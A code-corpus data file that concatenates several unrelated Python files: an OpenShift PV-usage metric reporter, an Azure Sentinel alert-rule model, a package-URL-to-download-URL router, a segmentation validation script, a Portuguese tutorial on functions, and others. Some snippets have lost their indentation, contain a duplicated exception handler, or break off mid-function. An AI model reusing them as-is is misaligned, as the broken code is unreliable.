    """Log and run a raw `oc` command through ocutil, returning its output."""
    logger.info(" ".join((base_cmd, cmd)))
    return ocutil.run_user_cmd(cmd, base_cmd=base_cmd)
def runOCcmd_yaml(cmd, base_cmd='oc'):
    """Log and run an `oc` command through ocutil, returning parsed YAML."""
    logger.info(" ".join((base_cmd, cmd)))
    return ocutil.run_user_cmd_yaml(cmd, base_cmd=base_cmd)
def parse_args():
    """Parse the command-line arguments (-v/--verbose)."""
    logger.debug("parse_args()")
    arg_parser = argparse.ArgumentParser(description='OpenShift pv usage ')
    arg_parser.add_argument('-v', '--verbose', action='store_true',
                            default=None, help='Verbose?')
    return arg_parser.parse_args()
def send_metrics(usage, capacity, used):
    """Push the pv usage metrics (percent, max GB, used GB) to zabbix."""
    logger.debug("send_metrics()")
    started = time.time()
    sender = MetricSender()
    logger.info("Send data to MetricSender")
    sender.add_metric({'openshift.master.pv.percent.usage': usage})
    sender.add_metric({'openshift.master.pv.capacity.max': capacity})
    sender.add_metric({'openshift.master.pv.capacity.used': used})
    sender.send_metrics()
    logger.info("Data sent to Zagg in %s seconds", str(time.time() - started))
def get_dynamic_pod_name():
    """Return the name of the online-volume-provisioner pod, or "".

    If several pods match, the last one listed wins (same as the
    original loop-overwrite behavior).
    """
    matcher = re.compile(r'online-volume-provisioner-')
    found = ""
    for pod in ocutil.get_pods()['items']:
        candidate = pod['metadata']['name']
        if matcher.search(candidate):
            found = candidate
    return found
def get_max_capacity(pod_name):
    """Read MAXIMUM_CLUSTER_CAPACITY from the given pod's environment.

    Returns the raw env value (a quantity string) or 0 when the
    variable is not set.
    """
    pod_env = runOCcmd_yaml(" env pod/" + pod_name)
    capacity = 0
    for entry in pod_env['spec']['containers'][0]['env']:
        if entry['name'] == 'MAXIMUM_CLUSTER_CAPACITY':
            capacity = entry['value']
    return capacity
def get_pv_usage():
    """Return total GB of pv capacity claimed outside infra namespaces.

    Skips unbound PVs (no claimRef) instead of crashing, excludes the
    "openshift-infra" and "logging" namespaces, and normalizes each
    capacity through convert_to_gb so units other than Gi (e.g. Mi, Ti)
    parse correctly (the old strip('GIgi') only handled Gi/G).
    """
    pv_info = runOCcmd_yaml(" get pv")
    total = 0
    for pv in pv_info['items']:
        claim = pv['spec'].get('claimRef')
        if not claim:
            # Unbound volume: no namespace, not counted as used.
            continue
        if claim['namespace'] in ("openshift-infra", "logging"):
            continue
        total += convert_to_gb(pv['spec']['capacity']['storage'])
    return total
def get_pv_usage_clusterresourcequota():
    """Fetch the persistent-volume clusterresourcequota as parsed YAML."""
    return runOCcmd_yaml(" get clusterresourcequota/persistent-volume ")
def convert_to_bytes(data):
    """Convert a storage quantity string (e.g. "5Gi", "1.5G", "42") to bytes.

    Supports binary (Ki/Mi/Gi/Ti) and decimal (k/M/G/T) suffixes; a bare
    number is taken as bytes. Fractional quantities such as "1.5Gi" are
    now parsed (the old integer-only regex silently truncated them).
    Raises Exception for an unrecognized suffix.
    """
    storage_units = {
        '': 1,
        'Ki': 2**10,
        'Mi': 2**20,
        'Gi': 2**30,
        'Ti': 2**40,
        'k': 10**3,
        # NOTE(review): lowercase 'm' is treated as mega here (kept from
        # the original); in Kubernetes quantities 'm' means milli.
        'm': 10**6,
        'M': 10**6,
        'G': 10**9,
        'T': 10**12,
    }
    number, unit = re.search(r"([0-9]*\.?[0-9]+)([A-Za-z]*)", data.strip()).groups()
    if unit in storage_units:
        # Keep exact integer arithmetic for integer inputs; only use
        # float math when the quantity actually has a fractional part.
        value = float(number) if '.' in number else int(number)
        return int(value * storage_units[unit])
    raise Exception("invalid input data: " + data)
def convert_to_kb(data):
    """Convert a storage quantity string to KiB (float)."""
    return convert_to_bytes(data) / 1024.0
def convert_to_mb(data):
    """Convert a storage quantity string to MiB (float)."""
    return convert_to_kb(data) / 1024.0
def convert_to_gb(data):
    """Convert a storage quantity string to GiB (float)."""
    return convert_to_mb(data) / 1024.0
def main():
    """Gather pv usage for the cluster and report it to the metric sender."""
    banner = '################################################################################'
    logger.info(banner)
    logger.info(' Starting Report pv usage - %s', datetime.datetime.now().strftime("%Y-%m-%d %H:%M"))
    logger.info(banner)
    logger.debug("main()")

    args = parse_args()
    if args.verbose:
        logger.setLevel(logging.DEBUG)

    ocutil.namespace = "openshift-infra"
    provisioner_pod = get_dynamic_pod_name()
    if provisioner_pod == "":
        # No dynamic provisioner pod: newer clusters track pv usage via
        # a clusterresourcequota object instead.
        quota = get_pv_usage_clusterresourcequota()
        capacity_max = quota['status']['total']['hard']['requests.storage']
        logger.debug("cluster_capacity_max: %s", capacity_max)
        pv_used = quota['status']['total']['used']['requests.storage']
        usage_pct = (convert_to_bytes(pv_used)*100)/convert_to_bytes(capacity_max)
        logger.debug("percent of usage of pv: %s", usage_pct)
        logger.debug("datasend to zabbix:")
        logger.debug("datasend to zabbix: max_gb %s", convert_to_gb(capacity_max))
        logger.debug("datasend to zabbix:pv used: %s", convert_to_gb(pv_used))
        send_metrics(usage_pct, convert_to_gb(capacity_max), convert_to_gb(pv_used))
    else:
        # Older clusters: read the configured maximum from the
        # provisioner pod's env and sum the non-infra PVs ourselves.
        capacity_max = get_max_capacity(provisioner_pod)
        logger.debug("cluster_capacity_max: %s", capacity_max)
        pv_used = get_pv_usage()
        logger.debug("cluster_pv_used: %s", pv_used)
        capacity_max_gb = convert_to_gb(capacity_max)
        usage_pct = (pv_used*100)/capacity_max_gb
        logger.debug("percent of usage of pv: %s", usage_pct)
        send_metrics(usage_pct, capacity_max_gb, pv_used)
if __name__ == "__main__":
main()
| 2.109375 | 2 |
src/sentinel/azext_sentinel/vendored_sdks/security_insights/models/scheduled_alert_rule.py | hpsan/azure-cli-extensions | 0 | 12765016 | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .alert_rule import AlertRule
class ScheduledAlertRule(AlertRule):
    """Represents scheduled alert rule.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar id: Azure resource Id
    :vartype id: str
    :ivar name: Azure resource name
    :vartype name: str
    :ivar type: Azure resource type
    :vartype type: str
    :param etag: Etag of the azure resource
    :type etag: str
    :param kind: Required. Constant filled by server.
    :type kind: str
    :param query: The query that creates alerts for this rule.
    :type query: str
    :param query_frequency: The frequency (in ISO 8601 duration format) for
     this alert rule to run.
    :type query_frequency: timedelta
    :param query_period: The period (in ISO 8601 duration format) that this
     alert rule looks at.
    :type query_period: timedelta
    :param severity: The severity for alerts created by this alert rule.
     Possible values include: 'High', 'Medium', 'Low', 'Informational'
    :type severity: str or ~securityinsights.models.AlertSeverity
    :param trigger_operator: The operation against the threshold that triggers
     alert rule. Possible values include: 'GreaterThan', 'LessThan', 'Equal',
     'NotEqual'
    :type trigger_operator: str or ~securityinsights.models.TriggerOperator
    :param trigger_threshold: The threshold triggers this alert rule.
    :type trigger_threshold: int
    :param event_grouping_settings: The event grouping settings.
    :type event_grouping_settings:
     ~securityinsights.models.EventGroupingSettings
    :param alert_rule_template_name: The Name of the alert rule template used
     to create this rule.
    :type alert_rule_template_name: str
    :param description: The description of the alert rule.
    :type description: str
    :param display_name: Required. The display name for alerts created by this
     alert rule.
    :type display_name: str
    :param enabled: Required. Determines whether this alert rule is enabled or
     disabled.
    :type enabled: bool
    :ivar last_modified_utc: The last time that this alert rule has been
     modified.
    :vartype last_modified_utc: datetime
    :param suppression_duration: Required. The suppression (in ISO 8601
     duration format) to wait since last time this alert rule been triggered.
    :type suppression_duration: timedelta
    :param suppression_enabled: Required. Determines whether the suppression
     for this alert rule is enabled or disabled.
    :type suppression_enabled: bool
    :param tactics: The tactics of the alert rule
    :type tactics: list[str or ~securityinsights.models.AttackTactic]
    :param incident_configuration: The settings of the incidents that created
     from alerts triggered by this analytics rule
    :type incident_configuration:
     ~securityinsights.models.IncidentConfiguration
    """

    # Constraints enforced by the service: readonly fields are ignored on
    # requests; required fields must be set before sending.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'kind': {'required': True},
        'display_name': {'required': True},
        'enabled': {'required': True},
        'last_modified_utc': {'readonly': True},
        'suppression_duration': {'required': True},
        'suppression_enabled': {'required': True},
    }

    # Maps Python attribute names to their JSON path and wire type used by
    # the msrest (de)serializer.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'etag': {'key': 'etag', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'query': {'key': 'properties.query', 'type': 'str'},
        'query_frequency': {'key': 'properties.queryFrequency', 'type': 'duration'},
        'query_period': {'key': 'properties.queryPeriod', 'type': 'duration'},
        'severity': {'key': 'properties.severity', 'type': 'str'},
        'trigger_operator': {'key': 'properties.triggerOperator', 'type': 'TriggerOperator'},
        'trigger_threshold': {'key': 'properties.triggerThreshold', 'type': 'int'},
        'event_grouping_settings': {'key': 'properties.eventGroupingSettings', 'type': 'EventGroupingSettings'},
        'alert_rule_template_name': {'key': 'properties.alertRuleTemplateName', 'type': 'str'},
        'description': {'key': 'properties.description', 'type': 'str'},
        'display_name': {'key': 'properties.displayName', 'type': 'str'},
        'enabled': {'key': 'properties.enabled', 'type': 'bool'},
        'last_modified_utc': {'key': 'properties.lastModifiedUtc', 'type': 'iso-8601'},
        'suppression_duration': {'key': 'properties.suppressionDuration', 'type': 'duration'},
        'suppression_enabled': {'key': 'properties.suppressionEnabled', 'type': 'bool'},
        'tactics': {'key': 'properties.tactics', 'type': '[str]'},
        'incident_configuration': {'key': 'properties.incidentConfiguration', 'type': 'IncidentConfiguration'},
    }

    def __init__(self, **kwargs):
        super(ScheduledAlertRule, self).__init__(**kwargs)
        self.query = kwargs.get('query', None)
        self.query_frequency = kwargs.get('query_frequency', None)
        self.query_period = kwargs.get('query_period', None)
        self.severity = kwargs.get('severity', None)
        self.trigger_operator = kwargs.get('trigger_operator', None)
        self.trigger_threshold = kwargs.get('trigger_threshold', None)
        self.event_grouping_settings = kwargs.get('event_grouping_settings', None)
        self.alert_rule_template_name = kwargs.get('alert_rule_template_name', None)
        self.description = kwargs.get('description', None)
        self.display_name = kwargs.get('display_name', None)
        self.enabled = kwargs.get('enabled', None)
        # Readonly: populated by the server, never sent by the client.
        self.last_modified_utc = None
        self.suppression_duration = kwargs.get('suppression_duration', None)
        self.suppression_enabled = kwargs.get('suppression_enabled', None)
        self.tactics = kwargs.get('tactics', None)
        self.incident_configuration = kwargs.get('incident_configuration', None)
        # Polymorphic discriminator identifying this AlertRule subtype.
        self.kind = 'Scheduled'
| 1.820313 | 2 |
src/packageurl/contrib/purl2url.py | canvasslabs/packageurl-python | 0 | 12765017 | # -*- coding: utf-8 -*-
#
# Copyright (c) the purl authors
# SPDX-License-Identifier: MIT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Visit https://github.com/package-url/packageurl-python for support and
# download.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from packageurl import PackageURL
from packageurl.contrib.route import Router
from packageurl.contrib.route import NoRouteAvailable
import requests
router = Router()
def purl2url(purl):
    """
    Return a URL inferred from the `purl` string, or None when `purl` is
    empty or no registered route can handle it.
    """
    if not purl:
        return
    try:
        return router.process(purl)
    except NoRouteAvailable:
        return


get_url = purl2url
@router.route("pkg:cargo/.*")
def build_cargo_download_url(purl):
"""
Return a cargo download URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
name = purl_data.name
version = purl_data.version
if not (name and version):
return
return "https://crates.io/api/v1/crates/{name}/{version}/download".format(
name=name, version=version
)
@router.route("pkg:bitbucket/.*")
def build_bitbucket_homepage_url(purl):
"""
Return a bitbucket homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
namespace = purl_data.namespace
name = purl_data.name
version = purl_data.version
subpath = purl_data.subpath
if not (name and namespace):
return
url = "https://bitbucket.org/{namespace}/{name}".format(
namespace=namespace, name=name
)
if version:
url = "{url}/src/{version}".format(url=url, version=version)
if subpath:
url = "{url}/{subpath}".format(url=url, subpath=subpath)
return url
@router.route("pkg:github/.*")
def build_github_homepage_url(purl):
"""
Return a github homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
namespace = purl_data.namespace
name = purl_data.name
version = purl_data.version
subpath = purl_data.subpath
if not (name and namespace):
return
url = "https://github.com/{namespace}/{name}".format(namespace=namespace, name=name)
if version:
url = "{url}/tree/{version}".format(url=url, version=version)
if subpath:
url = "{url}/{subpath}".format(url=url, subpath=subpath)
return url
@router.route("pkg:gitlab/.*")
def build_gitlab_homepage_url(purl):
"""
Return a gitlab homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
namespace = purl_data.namespace
name = purl_data.name
version = purl_data.version
subpath = purl_data.subpath
if not (name and namespace):
return
url = "https://gitlab.com/{namespace}/{name}".format(namespace=namespace, name=name)
if version:
url = "{url}/-/tree/{version}".format(url=url, version=version)
if subpath:
url = "{url}/{subpath}".format(url=url, subpath=subpath)
return url
@router.route("pkg:rubygems/.*")
def build_gem_download_url(purl):
"""
Return a rubygems homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
name = purl_data.name
version = purl_data.version
if not (name and version):
return
return "https://rubygems.org/downloads/{name}-{version}.gem".format(
name=name, version=version
)
@router.route("pkg:maven/.*")
def build_maven_download_url(purl):
"""
Return a maven homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
name = purl_data.name
version = purl_data.version
#distribution = '' # for binary jar
distribution = '-sources' # for source
if not (name and version):
return
return "https://repo.maven.apache.org/maven2/{name}/{name}/{version}/{name}-{version}{distribution}.jar".format(name=name, version=version, distribution=distribution)
@router.route("pkg:npm/.*")
def build_npm_download_url(purl):
"""
Return an npm homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
namespace = purl_data.namespace
name = purl_data.name
version = purl_data.version
# javascript appears to be source-only.
# Across all of the npmjs URLs we've observed, all have '/-/' before the name-version.tgz.
# They all end in tgz. (No zip files, etc.)
# If namespace '@something' is present, it is placed before 'name'.
# Otherwise the namespace level is collapsed.
if namespace:
return "https://registry.npmjs.org/{namespace}/{name}/-/{name}-{version}.tgz".format(namespace=namespace, name=name, version=version)
else:
return "https://registry.npmjs.org/{name}/-/{name}-{version}.tgz".format(name=name, version=version)
@router.route("pkg:pypi/.*")
def build_pypi_download_url(purl):
"""
Return an npm homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
namespace = purl_data.namespace
name = purl_data.name
version = purl_data.version
subpath = purl_data.subpath
#distribution = 'bdist' # for binary (wheel, etc.)
distribution = 'sdist' # for source
# TODO: Caching these results would allow multiple versions to be
# handled from the same query.
results = requests.get("https://pypi.org/pypi/{name}/json".format(name=name))
try:
if results.status_code == 200:
for item in results.json()['releases'][version]:
# packagetype can be 'sdist', 'bdist-whl', etc.
if distribution in item['packagetype']:
# if distribution is never found, fall through and return None.
return item['url']
except KeyError:
# assume that an IndexError is caused by a bad reply and return None.
pass
except KeyError:
# assume that a KeyError is caused by an incorrect version string, or
# a bad reply. Return None in either case.
pass
# return None unless complete success.
return None
| 1.875 | 2 |
submissions/joi2014yo/a.py | m-star18/atcoder | 1 | 12765018 | <filename>submissions/joi2014yo/a.py
import sys

read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)

# Five exam scores, each raised to a minimum of 40 points, then the
# integer average of the adjusted scores.
adjusted = [max(40, int(readline())) for _ in range(5)]
print(sum(adjusted) // 5)
| 2.578125 | 3 |
setup.py | bobrik/py-cpuinfo | 0 | 12765019 | <reponame>bobrik/py-cpuinfo
# Copyright (c) 2014-2021 <NAME> <<EMAIL>>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
import os

from setuptools import setup


# The PyPI long description is taken verbatim from the README.
with open(os.path.join(os.getcwd(), 'README.rst'), 'r') as readme_file:
    readme_content = readme_file.read()


CLASSIFIERS = [
    "Development Status :: 5 - Production/Stable",
    "Topic :: Utilities",
    "License :: OSI Approved :: MIT License",
    "Programming Language :: Python :: 2.7",
    "Programming Language :: Python :: 3",
]

setup(
    name="py-cpuinfo",
    version="7.0.0",
    author="<NAME>",
    author_email="<EMAIL>",
    description="Get CPU info with pure Python 2 & 3",
    long_description=readme_content,
    license="MIT",
    url="https://github.com/workhorsy/py-cpuinfo",
    packages=["cpuinfo"],
    test_suite="test_suite",
    entry_points={
        "console_scripts": ["cpuinfo = cpuinfo:main"],
    },
    classifiers=CLASSIFIERS,
)
| 1.710938 | 2 |
Secao8_FuncoesPython/DefinindoFuncoes.py | PauloFTeixeira/curso_python | 0 | 12765020 | """
- São pequenas partes de código que realizam tarefas específicas
- Pode ou não receber entrada de dados e retornar uma saída de dados
- Muito úteis para executar procedimentos similares por repetidas vezes
OBS.: Se a função realiza várias tarefas dentro dela, é bom fazer uma verificação para que a função seja simplificada
Exemplos.: print('Olá mundo')
# função
lista = []
lista.append(1)
# função
Funções integradas do Python são chamadas de Built-in, Ex.: print(), lem)(), append() e outras...
Conceito DRY -> Don't repeat yourself (não repita você mesmo / não repita seu código)
DEFINIÇÃO DE FUNÇÕES:
def nome_da_função(parâmetro_de_entrada):
bloco da função
ONDE:
Nome da função: sempre minúsculo, se for composto separar com underline (_)
Parâmetro de entrada: Opcional, se for mais de um separar com vírgula (,), podendo ser opcional ou não
Bloco da função: Onde o processamento acontece, pode ter ou não retorno da função. Identado com 4 espaços
Abre-se a função com a palavra reservada "def"
def diz_oi():
print('Oi!')
diz_oi()
---------------------------------------------------------------------------------------------------------------------
# FUNÇÕES COM RETORNO
# Exemplo de função com retorno
lista = [1, 2, 3]
lista.pop()
ret_pop = lista.pop()
print(f'O retorno de pop é: {ret_pop}')
# Exemplo de função sem retorno
lista = [1, 2, 3]
ret_print = print(lista)
print(f'O retorno do print é: {ret_print}') # Retorno é none
# OBS.: Em python, quando a funçao não tem retorno, o valor é none
# OBS.: Funções python que retornam valores, devem retornar esses valores com a palavras reservada "return"
---------------------------------------------------------------------------------------------------------------------
# Exemplo - Sem retorno
def quadrado_de_7():
print(7 * 7)
ret = quadrado_de_7
print(ret)
---------------------------------------------------------------------------------------------------------------------
# Exemplo - Com retorno
def quadrado_de_sete():
return 7 * 7
quadrado_de_7()
print(quadrado_de_sete())
OBS.: Não é obrigatório criar variável para receber o retorno, pode-se passar a execução da função para outra
função
---------------------------------------------------------------------------------------------------------------------
# Return é bom para se juntar o retorno com outras partes do código
alguem = '<NAME>'
def oi():
return 'Oi '
print(oi() + alguem)
---------------------------------------------------------------------------------------------------------------------
# Observações sobre a palavras "return"
1 - Ela finaliza a função
2 - Pode-se ter vários return em uma função
3 - Pode-se, em uma função, retornar qualquer tipo de dado e até mesmo multiplicar valores
# Exemplo 1 - return finaliza a função
def oi():
return 'Oi'
print('Olá') # não vai exexutar, porque finalizou no return
print(oi())
---------------------------------------------------------------------------------------------------------------------
# Exemplo 2 - vários return
def nova():
variavel = False
if variavel:
return 4
elif variavel is None:
return 3.2
return 'B'
print(nova())
---------------------------------------------------------------------------------------------------------------------
# Exemplo 3 - retornar qualquer tipo de dado
def outra():
return 2, 3, 4, 5
num1, num2, num3, num4 = outra()
print(num1, num2, num3, num4)
---------------------------------------------------------------------------------------------------------------------
# Função jogar CARA OU COROA
from random import random
def jogar_moeda():
valor = random()
if valor > 0.5:
return 'Cara'
return 'Coroa'
print(jogar_moeda())
---------------------------------------------------------------------------------------------------------------------
"""
| 4.4375 | 4 |
jocasta/connectors/influx.py | chrishannam/zeep | 0 | 12765021 | import json
from influxdb import InfluxDBClient
import logging
import platform
from typing import Dict, List
# Root logging setup: timestamped, millisecond-precision messages. Level is
# ERROR by default so the connector stays quiet unless reconfigured.
logging.basicConfig(
    level=logging.ERROR,
    format='%(asctime)s.%(msecs)03d %(levelname)s: %(message)s',
    datefmt='%Y-%m-%d %H:%M:%S',
)

logger = logging.getLogger(__name__)
class InfluxDBConnector(object):
    """Thin wrapper around InfluxDBClient for writing sensor readings."""

    def __init__(self, database, password, username, host=None, port=None):
        # Fall back to a local default server when host/port are omitted.
        resolved_host = host if host else 'localhost'
        resolved_port = port if port else 8086
        self.influx_client = InfluxDBClient(
            resolved_host, resolved_port, username, password, database
        )

    def send(self, data: Dict, hostname: str = None) -> None:
        """
        Send the data over to the Influx server.
        """
        payload = _build_payload(data, hostname=hostname)

        logger.info('Sending payload to InfluxDB server')
        logger.info(json.dumps(payload, indent=2))
        self.influx_client.write_points(payload)
        logger.info('Payload sent')
def _build_payload(data: Dict, hostname: str = None) -> List:
    """
    Break out each reading into measurements that Influx will understand.

    Returns a list of point dicts, one per reading in `data`. The special
    'location' key is used as a tag rather than a measurement. Unlike the
    previous version, the caller's dict is no longer mutated.
    """
    logger.info('Building payload for Influxdb')

    payload_values = []

    # Work on a shallow copy so popping 'location' does not mutate the
    # caller's dict (the old data.pop(...) removed the key from the input).
    readings = dict(data)

    # location isn't a measurement we want to log.
    location = readings.pop('location', 'unset location')

    if not hostname:
        hostname = platform.node()

    for name, value in readings.items():
        payload = {
            'measurement': name,
            'tags': {'host': hostname, 'location': location},
            'fields': {'value': float(value)},
        }
        payload_values.append(payload)

    return payload_values
| 2.875 | 3 |
validate.py | hkchengrex/pytorch-semseg | 1 | 12765022 | <reponame>hkchengrex/pytorch-semseg
import yaml
import torch
import argparse
import timeit
import numpy as np
from PIL import Image
from torch.utils import data
from ptsemseg.models import get_model
from ptsemseg.loader import get_loader
from ptsemseg.metrics import runningScore
from ptsemseg.utils import convert_state_dict
# Let cuDNN auto-tune convolution algorithms; faster after warm-up when
# input sizes are fixed across iterations.
torch.backends.cudnn.benchmark = True
def im_inv_trans(im):
    """Undo the per-channel mean subtraction on a CHW image, reverse the
    channel order, and return the result in HWC layout.

    Note: `im` is modified in place (the means are added to it) and the
    returned array is a view of it.
    """
    # im = im*255
    channel_means = (104.00699, 116.66877, 122.67892)
    for channel, mean in enumerate(channel_means):
        im[channel, :, :] += mean
    reordered = im[::-1, :, :]
    return reordered.transpose(1, 2, 0)
def color_map(N=256, normalized=False):
    """Build the N-entry PASCAL VOC color palette as an (N, 3) array.

    Each label index is spread bit-by-bit across the R/G/B channels.
    Returns uint8 values in [0, 255], or float32 in [0, 1] when
    `normalized` is True.
    """
    def bit(value, idx):
        return (value >> idx) & 1

    dtype = 'float32' if normalized else 'uint8'
    cmap = np.zeros((N, 3), dtype=dtype)
    for label in range(N):
        r = g = b = 0
        c = label
        # Consume three bits of the label per round, placing them from the
        # most significant color bit downwards.
        for shift in range(7, -1, -1):
            r = r | (bit(c, 0) << shift)
            g = g | (bit(c, 1) << shift)
            b = b | (bit(c, 2) << shift)
            c = c >> 3
        cmap[label] = np.array([r, g, b])

    return cmap / 255 if normalized else cmap
def validate(cfg, args):
    """Run the validation split through a saved segmentation model and print
    overall scores plus per-class IoU.

    cfg: parsed YAML config dict (data/model/training sections).
    args: argparse namespace with model_path, eval_flip and measure_time.
    """
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

    # Setup Dataloader
    data_loader = get_loader(cfg["data"]["dataset"])
    data_path = cfg["data"]["path"]

    loader = data_loader(
        data_path,
        split=cfg["data"]["val_split"],
        is_transform=True,
        img_size=(cfg["data"]["img_rows"], cfg["data"]["img_cols"]),
    )

    n_classes = loader.n_classes

    valloader = data.DataLoader(loader, batch_size=cfg["training"]["batch_size"], num_workers=8)
    running_metrics = runningScore(n_classes)

    # Setup Model
    model = get_model(cfg["model"], n_classes).to(device)
    state = convert_state_dict(torch.load(args.model_path)["model_state"])
    model.load_state_dict(state)
    model.eval()
    model.to(device)

    for i, (images, labels) in enumerate(valloader):
        start_time = timeit.default_timer()

        images = images.to(device)

        if args.eval_flip:
            # Test-time augmentation: average logits of the image and its
            # horizontal flip (flip applied on the last, width, axis).
            outputs = model(images)

            # Flip images in numpy (not support in tensor)
            outputs = outputs.data.cpu().numpy()
            flipped_images = np.copy(images.data.cpu().numpy()[:, :, :, ::-1])
            flipped_images = torch.from_numpy(flipped_images).float().to(device)
            outputs_flipped = model(flipped_images)
            outputs_flipped = outputs_flipped.data.cpu().numpy()
            # Un-flip the flipped prediction before averaging.
            outputs = (outputs + outputs_flipped[:, :, :, ::-1]) / 2.0

            pred = np.argmax(outputs, axis=1)
        else:
            outputs = model(images)
            pred = outputs.data.max(1)[1].cpu().numpy()

        # NOTE(review): predictions are shifted by one before scoring —
        # presumably the ground-truth labels reserve 0 for an ignore/void
        # class; confirm against the dataset loader.
        pred = pred + 1
        gt = labels.numpy()

        # Commented-out visualization of GT / prediction / input, kept for
        # debugging.
        # gt_im = Image.fromarray(gt[0, :, :].astype('uint8'), mode='P')
        # gt_im.putpalette(color_map())
        # gt_im.save('output/%d_gt.png' % i)
        # pred_im = Image.fromarray(pred[0, :, :].astype('uint8'), mode='P')
        # pred_im.putpalette(color_map())
        # pred_im.save('output/%d_pred.png' % i)
        # # print(images.min(), images.max(), images.mean())
        # rgb_im = images[0, :, :, :].detach().cpu().numpy()
        # rgb_im = im_inv_trans(rgb_im)
        # rgb_im = Image.fromarray(rgb_im.astype('uint8'))
        # rgb_im.save('output/%d_im.png' % i)

        if args.measure_time:
            elapsed_time = timeit.default_timer() - start_time
            print(
                "Inference time \
                  (iter {0:5d}): {1:3.5f} fps".format(
                    i + 1, pred.shape[0] / elapsed_time
                )
            )
        running_metrics.update(gt, pred)

    score, class_iou = running_metrics.get_scores()

    for k, v in score.items():
        print(k, v)

    # Per-class IoU; the last class index is skipped here.
    for i in range(n_classes-1):
        print(i, class_iou[i])
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Hyperparams")
parser.add_argument(
"--config",
nargs="?",
type=str,
default="configs/fcn8s_pascal.yml",
help="Config file to be used",
)
parser.add_argument(
"--model_path",
nargs="?",
type=str,
default="fcn8s_pascal_1_26.pkl",
help="Path to the saved model",
)
parser.add_argument(
"--eval_flip",
dest="eval_flip",
action="store_true",
help="Enable evaluation with flipped image |\
True by default",
)
parser.add_argument(
"--no-eval_flip",
dest="eval_flip",
action="store_false",
help="Disable evaluation with flipped image |\
True by default",
)
parser.set_defaults(eval_flip=True)
parser.add_argument(
"--measure_time",
dest="measure_time",
action="store_true",
help="Enable evaluation with time (fps) measurement |\
True by default",
)
parser.add_argument(
"--no-measure_time",
dest="measure_time",
action="store_false",
help="Disable evaluation with time (fps) measurement |\
True by default",
)
parser.set_defaults(measure_time=True)
args = parser.parse_args()
with open(args.config) as fp:
cfg = yaml.load(fp)
validate(cfg, args)
| 2.109375 | 2 |
plots/for_paper/nice_plots.py | jacqueschen1/adam_sgd_heavy_tails | 1 | 12765023 | <reponame>jacqueschen1/adam_sgd_heavy_tails
"""
Used to generate the plots for the increasing batch size experiments
"""
import pandas
import numpy as np
import matplotlib.pyplot as plt
import math
import data_helpers as h
import fplt
import data_selection
import plotting_common as plth
from plotting_common import (
BEST_PLOT,
METRIC_VS_SS,
dataset_sizes,
LABEL_ADAM,
LABEL_SGD,
LABEL_TO_STYLE,
get_value_at_end_of_run_for_ids,
tag_yaxis,
)
# %%
# Plotting constants and magic strings
def gen_best_run_plot(
    args,
    model,
    dataset,
    ax,
    batch_size=-1,
    acc_step=-1,
    metric=h.TRAIN_LOSS,
    yaxis_labels=False,
    legend=False,
    iteration_limit=-1,
):
    """Plot the best SGD and Adam runs for one (model, dataset, batch size)
    cell on `ax`, and dump the selected run data via plth.save_data.

    `batch_size * acc_step` (absolute value) is the effective batch size
    shown in the panel title. `iteration_limit` <= 0 means "derive it from
    the problem" (see plth.iter_limit_and_per_epoch).
    """
    # This plot family is only used for the increasing-batch-size study.
    big_batch = True
    full_batch = False

    (adam_data, sgd_data, adam_nm_data, sgd_m_data,) = data_selection.select_runs(
        acc_step, batch_size, big_batch, dataset, full_batch, metric, model
    )

    iteration_limit, num_iterations_per_epoch = plth.iter_limit_and_per_epoch(
        acc_step, batch_size, big_batch, dataset, iteration_limit, model
    )

    plot_best_run(
        ax,
        LABEL_SGD,
        sgd_data,
        metric,
        iteration_limit=iteration_limit,
        num_iterations_per_epoch=num_iterations_per_epoch,
    )
    plot_best_run(
        ax,
        LABEL_ADAM,
        adam_data,
        metric,
        iteration_limit=iteration_limit,
        num_iterations_per_epoch=num_iterations_per_epoch,
    )

    # Accuracy-like metrics get a fixed linear range; losses get a log axis.
    if metric in [h.TRAIN_ACC, h.F_ONE]:
        ax.set_ylim([50, 102.5])
    else:
        ax.set_yscale("log")

    if yaxis_labels:
